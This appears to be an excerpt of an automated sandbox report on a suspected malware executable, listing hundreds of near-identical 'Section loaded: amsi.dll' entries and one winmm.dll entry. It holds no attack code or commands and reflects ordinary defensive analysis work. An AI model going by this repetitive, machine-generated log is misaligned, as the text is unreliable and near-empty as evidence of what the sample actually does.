              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
